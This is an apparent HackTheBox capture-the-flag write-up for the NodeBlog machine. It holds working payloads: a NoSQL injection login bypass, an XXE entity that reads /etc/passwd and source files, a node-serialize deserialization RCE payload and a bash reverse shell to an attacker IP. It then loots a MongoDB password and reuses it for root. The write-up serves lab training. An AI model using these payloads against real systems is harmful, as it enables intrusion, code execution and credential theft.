# NodeBlog - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

NodeBlog was a fun, easy-rated HTB machine created by [ippsec](https://twitter.com/ippsec)

For user, we exploit XXE and insecure deserialization.  
Then, we explore MongoDB to find a password and reuse it for root.

## Initial recon

```console
opcode@parrot$ nmap -v -p- 10.10.11.139
Nmap scan report for 10.10.11.139
Host is up (0.11s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp
```

```console
opcode@parrot$ nmap -sC -sV -p 22,5000 -oN nodeblog.nmap 10.10.11.139
Nmap scan report for 10.10.11.139
Host is up (0.097s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ea:84:21:a3:22:4a:7d:f9:b5:25:51:79:83:a4:f5:f2 (RSA)
|   256 b8:39:9e:f4:88:be:aa:01:73:2d:10:fb:44:7f:84:61 (ECDSA)
|_  256 22:21:e9:f4:85:90:87:45:16:1f:73:36:41:ee:3b:32 (ED25519)
5000/tcp open  http    Node.js (Express middleware)
|_http-title: Blog
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Two ports, an SSH (22) and an HTTP (5000), are exposed.  

Visiting <http://10.10.11.139:5000/> in a browser, we'd get:

![1](images/1.png)

## NoSQL injection

There is a login page at `/login`  
`admin:admin` or SQL injection didn't work, but we learnt that `admin` is a valid username.

We can also try NoSQL injection. Send a login request to repeater in `burp` and change `Content-Type: application/x-www-form-urlencoded` to `Content-Type: application/json`. Also, change the body to:

```json
{"user":"admin","password":{"$ne": "admin"}}
```

It worked. We can now repeat this step after intercepting a valid login request.  
After logging in as admin, we should be able to add new articles and edit or delete existing articles.

I tried adding `<img src=x onerror=alert(1)>` in the body but got no XSS.  
Also, sending invalid JSON on the login page shows this error and reveals webroot:

```text
SyntaxError: Unexpected end of JSON input
    at JSON.parse (<anonymous>)
    at parse (/opt/blog/node_modules/body-parser/lib/types/json.js:89:19)
    at /opt/blog/node_modules/body-parser/lib/read.js:121:18
    at invokeCallback (/opt/blog/node_modules/raw-body/index.js:224:16)
    at done (/opt/blog/node_modules/raw-body/index.js:213:7)
    at IncomingMessage.onEnd (/opt/blog/node_modules/raw-body/index.js:273:7)
    at IncomingMessage.emit (events.js:412:35)
    at endReadableNT (internal/streams/readable.js:1334:12)
    at processTicksAndRejections (internal/process/task_queues.js:82:21)
```

## XXE File Read

Logging in as admin also adds an "Upload" button to the interface.  
On trying to upload an image, I got this error:

```text
Invalid XML Example: <post><title>Example Post</title><description>Example Description</description><markdown>Example Markdown</markdown></post>
```

We can test for XXE. First, I tried uploading a valid file:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<post>
  <title>Touch</title>
  <description>Grass</description>
  <markdown>Permission denied</markdown>
</post>
```

It works as expected. It brings me to the new post windows with those fields auto-filled.  
Now, we can try adding external entities.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<post>
  <title>Touch</title>
  <description>Grass</description>
  <markdown>&xxe;</markdown>
</post>
```

After uploading, I found that the markdown field was auto-filled with:

```text
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
admin:x:1000:1000:admin:/home/admin:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mongodb:x:109:117::/var/lib/mongodb:/usr/sbin/nologin
```

I failed to read `/home/admin/.ssh/id_rsa`.  
Since we already know that the webroot is `/opt/blog/`, we can guess the filename to be `main.js`, `server.js`, or `app.js`.

`/opt/blog/server.js` worked:

```js
const express = require('express')
const mongoose = require('mongoose')
const Article = require('./models/article')
const articleRouter = require('./routes/articles')
const loginRouter = require('./routes/login')
const serialize = require('node-serialize')
const methodOverride = require('method-override')
const fileUpload = require('express-fileupload')
const cookieParser = require('cookie-parser');
const crypto = require('crypto')
const cookie_secret = "UHC-SecretCookie"
//var session = require('express-session');
const app = express()

mongoose.connect('mongodb://localhost/blog')

app.set('view engine', 'ejs')
app.use(express.urlencoded({ extended: false }))
app.use(methodOverride('_method'))
app.use(fileUpload())
app.use(express.json());
app.use(cookieParser());
//app.use(session({secret: "UHC-SecretKey-123"}));

function authenticated(c) {
    if (typeof c == 'undefined')
        return false

    c = serialize.unserialize(c)

    if (c.sign == (crypto.createHash('md5').update(cookie_secret + c.user).digest('hex')) ){
        return true
    } else {
        return false
    }
}


app.get('/', async (req, res) => {
    const articles = await Article.find().sort({
        createdAt: 'desc'
    })
    res.render('articles/index', { articles: articles, ip: req.socket.remoteAddress, authenticated: authenticated(req.cookies.auth) })
})

app.use('/articles', articleRouter)
app.use('/login', loginRouter)


app.listen(5000)
```

## Insecure deserialization for RCE

The function `unserialize()` from `node-serialize` module is being used on cookie `auth`.  
It can be abused for RCE. I have seen something very similar in an old CTF: <https://web.archive.org/web/20210621214153/https://isopach.dev/Zh3r0-CTF-2021/>

We can use the payload from this article and try a `ping`.  
We need to generate the payload first. I created [deser.js](deser.js):

```js
var tmp = {
  rce: function () {
    require("child_process").exec("ping -c 2 10.10.14.147", function (error, stdout, stderr) {
      console.log(stdout);
    });
  },
};

var serialize = require("node-serialize");

console.log("Payload: \n" + serialize.serialize(tmp));
```

```console
opcode@parrot$ cd /tmp
opcode@parrot$ npm install node-serialize
opcode@parrot$ node deser.js 
Payload: 
{"rce":"_$$ND_FUNC$$_function () {\n    require(\"child_process\").exec(\"ping -c 2 10.10.14.147\", function (error, stdout, stderr) {\n      console.log(stdout);\n    });\n  }"}
```

```console
opcode@parrot$ curl 'http://10.10.11.139:5000/' -b auth='{"rce":"_$$ND_FUNC$$_function () {\n    require(\"child_process\").exec(\"ping -c 2 10.10.14.147\", function (error, stdout, stderr) {\n      console.log(stdout);\n    });\n  }"}'
```

It was a massive pain to get the command to even work. Therefore, I URL encoded it:

```console
opcode@parrot$ curl 'http://10.10.11.139:5000/' -b 'auth=%7B%22rce%22%3A%22_%24%24ND_FUNC%24%24_function%20()%20%7B%5Cn%20%20%20%20require(%5C%22child_process%5C%22).exec(%5C%22ping%20-c%202%2010.10.14.147%5C%22%2C%20function%20(error%2C%20stdout%2C%20stderr)%20%7B%5Cn%20%20%20%20%20%20console.log(stdout)%3B%5Cn%20%20%20%20%7D)%3B%5Cn%20%20%7D%22%7D'
```

Even this one did not work. I also tried putting it in a file as well as doing it entirely with `burp`.  
I looked at 0xdf's write-up, and he URL encodes every single character in `burp`.  
Doing that did not fix my issue either. I also had to add another `()` somewhere near the end.  
My final payload for `ping`:

```json
{"rce":"_$$ND_FUNC$$_function () {\n    require(\"child_process\").exec(\"ping -c 2 10.10.14.147\", function (error, stdout, stderr) {\n      console.log(stdout);\n    });\n  }()"}
```

My payload for reverse shell:

```json
{"rce":"_$$ND_FUNC$$_function () {\n    require(\"child_process\").exec('bash -c \"bash -i >& /dev/tcp/10.10.14.147/9001 0>&1\"', function (error, stdout, stderr) {\n      console.log(stdout);\n    });\n  }()"}
```

In burp, it becomes:

```http
Cookie: auth=%7b%22%72%63%65%22%3a%22%5f%24%24%4e%44%5f%46%55%4e%43%24%24%5f%66%75%6e%63%74%69%6f%6e%20%28%29%20%7b%5c%6e%20%20%20%20%72%65%71%75%69%72%65%28%5c%22%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%5c%22%29%2e%65%78%65%63%28%27%62%61%73%68%20%2d%63%20%5c%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%31%30%2e%31%34%2e%31%34%37%2f%39%30%30%31%20%30%3e%26%31%5c%22%27%2c%20%66%75%6e%63%74%69%6f%6e%20%28%65%72%72%6f%72%2c%20%73%74%64%6f%75%74%2c%20%73%74%64%65%72%72%29%20%7b%5c%6e%20%20%20%20%20%20%63%6f%6e%73%6f%6c%65%2e%6c%6f%67%28%73%74%64%6f%75%74%29%3b%5c%6e%20%20%20%20%7d%29%3b%5c%6e%20%20%7d%28%29%22%7d
```

After getting the shell, we can stabilize it:

```console
admin@nodeblog:/opt/blog$ python3 -c 'import pty;pty.spawn("/bin/bash");'
admin@nodeblog:/opt/blog$ ^Z
opcode@parrot$ stty raw -echo; fg
admin@nodeblog:/opt/blog$ export TERM=xterm-256color
admin@nodeblog:/opt/blog$ exec /bin/bash
```

Something is odd:

```console
admin@nodeblog:/opt/blog$ cat /home/admin/flag.txt
cat: /home/admin/flag.txt: Permission denied
admin@nodeblog:/opt/blog$ ls -la /home
total 16
drwxr-xr-x 1 root  root   10 Dec 27  2021 .
drwxr-xr-x 1 root  root  180 Dec 27  2021 ..
drw-r--r-- 1 admin admin 220 Jan  3  2022 admin
```

Directories need the `x` permission in order to be entered.  
We can set it:

```console
admin@nodeblog:/opt/blog$ chmod +x /home/admin
```

We can enter the directory and read the flag now.

## Exploring MongoDB and password reuse

```console
admin@nodeblog:~$ netstat -tulnp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:27017         0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::5000                 :::*                    LISTEN      861/node /opt/blog/ 
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   
```

MongoDB uses port 27017. It is running as root.  
We can transfer [mongosh](https://www.mongodb.com/try/download/shell) to interact with it.  
To get the standalone binary, select "Linux Tarball 64-bit" as "Platform"  
The binary was ~ 100M, I should have used `upx`

```console
admin@nodeblog:~$ chmod +x mongosh 
admin@nodeblog:~$ ./mongosh --host 127.0.0.1 --port 27017
```

```console
test> show databases
admin    32.00 KiB
blog    140.00 KiB
config   96.00 KiB
local    76.00 KiB
```

`blog` is the database of interest:

```console
test> use blog
switched to db blog
blog> show collections
articles
users
```

The `users` collection is always worth looking into.

```console
blog> db.users.find().pretty()
[
  {
    _id: ObjectId("61b7380ae5814df6030d2373"),
    createdAt: ISODate("2021-12-13T12:09:46.009Z"),
    username: 'admin',
    password: 'IppsecSaysPleaseSubscribe',
    __v: 0
  }
]
```

The password `IppsecSaysPleaseSubscribe` also works for user `admin` on the box.

```console
admin@nodeblog:~$ sudo -l
[sudo] password for admin: 
Matching Defaults entries for admin on nodeblog:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User admin may run the following commands on nodeblog:
    (ALL) ALL
    (ALL : ALL) ALL
```

The root is free:

```console
admin@nodeblog:~$ sudo bash
root@nodeblog:/home/admin# id
uid=0(root) gid=0(root) groups=0(root)
```
